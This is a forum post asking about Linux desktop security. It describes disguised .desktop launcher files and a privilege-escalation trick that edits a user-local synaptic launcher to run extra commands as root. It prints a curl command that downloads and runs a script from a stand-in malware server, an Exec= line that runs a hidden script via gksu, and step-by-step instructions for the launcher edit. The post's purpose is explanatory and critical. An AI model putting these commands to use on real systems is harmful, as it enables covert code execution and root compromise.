Perhaps this has been discussed elsewhere, I looked but didn't see, sorry.

I recently read an article about the changing face of the Linux desktop environment, most importantly that it seems to be drastically deviating from the *nix practices that make Linux 'safer'.

The article discussed the *.desktop file suffix and how this "feature" made possible the previously unlikely event of downloading a text file, double-clicking and executing a malicious command without knowing. Not only did this feature make a double-clicked text file executable (technically not true but the end result is the execution of a command after clicking) it also hides the .desktop suffix and you can name the file something like Really_Cool_Song.mp3. You can also point this file to an icon of your choice (located on the system in a default location) to make it look like something music related. Now you have downloaded and executable file that has an icon you equate with music and a misleading name of Really_Cool_Song.mp3 with the .desktop suffix hidden. You double click to listen and instead some serious pwnage ensues. Game over that is it. It doesn't have to be an mp3 of course, it could be any fake file extension and any misleading icon.

The example given was executing this command:
% bash -c "curl h++p://www.some_malware_server.org/s.py -o /tmp/s.py; python /tmp/s.py"

now you have executed a complex script, that could run anything from a number of local root exploits to do further damage **I understand these are generally found and patched relatively quickly, but I am assuming this attacker has found a new one or is testing for an unpatched system** or 99% of the time just acces to the average desktop user's files is damage enough.

If the system is patched and the local root exploit fails, the author explains a clever and easy privilege escalation tactic. In ~/.local/share/applications one can add their own 'hidden' .desktop launcher file to execute whatever they want as root. When you execute synaptic by clicking its icon from the Gnome menu, a Gnome environment variable tells the program to check your local folder then if nothig is there, it uses /usr/share/applications where the appropriate uneditable one resides.

here is a line that could be slipped into the hacker's custom launcher file:
Exec=gksu python .local/.hidden/s.py /usr/sbin/synaptic

You Can try this at Home!:
cp /usr/share/applications/synaptic.desktop ~/.local/share/applications
use your favorite editor and edit the "Exec=" line, adding whatever root command you want, keep in mind if the command gksu/sudo(for me su-to-root) is there you have to leave it. Just squeeze the extra command after the sudo but before /usr/sbin/synaptic.
here is one where I launch wireshark & synaptic as root by launching synaptic:
Exec=gksu /usr/bin/wireshark& /usr/sbin/synaptic
Obviously if you try this don't do something detrimental to your own computer!!

This idea is a bit of a guessing game but it is pretty safe to assume you will run a trusted program such as update manager or synaptic sooner or later (using Debian or Ubuntu) now when you click synaptic from your Gnome menu you run synaptic and the hacker's not-so-arbitrary code as root, again game over. All of this done initially with user privileges.

All the typical what-ifs aside, this was a very real possibility only 1-2 years ago. When 10 years ago this would have never happened. The *.desktop issue has more or less been fixed, if you download a file with .desktop you can no longer just click and run (there is a prompt now that says the file is untrusted, so you can still run it, but more steps should keep execution very unlikely) and the .desktop suffix isn't hidden, thus raising lots of red flags....hopefully. Although gaining remote user privileges is a bit harder again, the escalation issue that was raised has been ignored. How can something so simple be overlooked for so long, when *nix boasts security. This is an ungodly simple escalation exploit and begs to ask the question how much more will the mainstream *nix development move away from it's previously strong security practices? Is there any easy way to keep this sort of command re-direct from taking place at a user level?

kim

Post Script
I do want to say that I believe the .desktop launcher slip up, if Gnome was in windows' spot, would have been fixed within a matter of a few days once in the wild, but a lot of machines would still be compromised due to this stupid feature. This still leaves the question of why? why? why? why? would you bypass one of the simple-but-great features of Linux for end-user ease of use? This sounds like the motto of the MS of the past. MS has even copied the better features of *nix because they work so well.

Also I say this issue has been fixed, however if you download a .tar.bz2 with the execute permission set before archiving, unarchive and you've got the same deception and the same stupid feature. Just reinforces the need to download only from trusting sources and stay informed.